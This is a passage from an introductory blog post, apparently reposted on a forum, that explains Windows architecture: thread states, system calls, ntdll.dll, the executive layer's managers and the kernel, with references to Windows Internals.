    • Threads: Threads execute code. As we have seen earlier, thread is an object under process, and it use resources available to process to perform tasks. Thread owns following information:
      • Current access mode (User or Kernel)
      • Execution context e.g. State of registers, page status etc.
      • One or two stacks, for local variables allocation and call management
      • Thread Local Storage array, data structure for thread data
      • Base and current priority
      • Processor affinity

    Threads has three states as below:

    1. Running: Currently executing code on processor
    2. Ready: Waiting for availability of busy or unavailable processors for execution
    3. Waiting: Waiting for some event to occur (e.g. Processor trap). After the event, thread changes state to Ready.

    We will explore this in next blogpost with practical example.

    • System Calls: System call is piece of software shared between various subsystems. WinAPI and NTAPI contains such system calls. We will explore this in much detail in next blog with practical example. This will be important as we need this to look closely in programming tutorials.

    Generalized OS Architecture:

    01-Windows-Architecture.jpg Windows OS Architecture

    Even though above diagram is shown as Windows Architecture, this is just speculated and simplified architecture. This is because the fact that Microsoft never revealed actual architecture. But don’t worry, above diagram is from Windows Internals book, which official Microsoft publication. Let’s try to understand each component one by one.

    1. Environment subsystem and subsystem DLLs: Environment subsystem is the interface between applications and some Windows executive system services. Subsystem does this with help of DLLs. Example of Environment subsystem is Windows subsystem, which has kernel32.dll, advapi32.dll, user32.dll etc. implementing Windows API functions. We will explore Windows subsystem in depth in future blog posts.
    2. NTDLL.dll: ntdll.dll is special system support library primarily for use of subsystem DLLs and native applications. This provide two types of functions.
      • System service dispatch stubs to Windows executive system services: These functions provide interface to user mode system services. Example NtCreateFile function available in Notepad. Many of these functions for accessible via WinAPI. We will explore this in next blogpost with practical example.
      • Internal support functions used by subsystems, subsystem DLLs, and other native images
    3. Windows Executive Layer: This is the only second lowest layer, sitting on top of Kernel (NTOSKRNL.exe). It has following components.
      • Configuration manager: Implements and manages system registry.
      • Process manager: Creates, terminates processes and threads. It deals with Windows Kernel to perform these activities.
      • Security Reference Manager: Enforces security policies on local computer. It guards OS resources, performing runtime object protection and auditing.
      • I/O manager: Implements device independent I/O. Responsible for dispatching to the appropriate device drivers for further processing.
      • Plug-n-Play manager: Determines which driver is appropriate for device and loading it.
      • Power manager: Power manager, with help of Processor power management and power management framework, co-ordinates power events and generate power management I/O notifications to device drivers.
      • Windows Driver Model (WDM) Windows Management Instrumentation (WMI) routines: These routines enable device drivers to publish performance and configuration information. It also receives commands from user mode WMI service.
      • Memory manager: Implements virtual memory. It also provides support to underlying cache manager. We will explore this in detail, during future blogposts.
      • Async LPC facility: It passes messages between client process and server process on same computer. It is also used as local transport for RPC.
      • Run-time library functions: This include string processing, arithmetic operations, data type conversion, and security structure processing.
      • Executive support routines: Includes system memory allocation (paged and non-paged pool), interlocked memory access, special types of synchronization mechanisms.
    4. Kernel: Kernel provides some fundamental mechanisms such as thread-scheduling and sync services, used by Windows executive layer, and low-level hardware architecture dependent support such as interrupt and exception dispatching. Kernel is coded in C + some instructions in assembly. To keep things simple at low level, Kernel implements simple “kernel objects”, which in turn supports executive objects. For example, Control objects define how OS functions must be controlled. Dispatcher objects define synchronization capabilities of thread scheduling. We will (and must) explore Kernel in depth while looking into driver dev blog.

    Conclusion:

    I have not covered each and everything in this post and cannot cover entire architecture in this humble blogpost. But I believe that I have covered enough details to get basic understanding of Windows architecture to move ahead with this journey. In next blogpost, we will use tools such as WinDBG and Sysinternal tools to dive into Windows architecture. Till then, Auf Wiedersehen!!!!

    References:

    1. Building blocks of OS is referred from Windows Kernel Programming by Pavel Yosifovich (@zodiacon)
    2. Generalized Windows Architecture is referred from Windows Internals Part 1 (7ed)

    SLAER

    1d89a7dbd04066d819ce88b6dc7be609?s=70&d=

    I am guy in infosec, who knows bits and bytes of one thing and another. I like to fiddle in many things and one of them is computer.

     

    Sursa: https://scriptdotsh.com/index.php/2019/05/13/winarch-theory/

    • Upvote 1
×
×
  • Create New...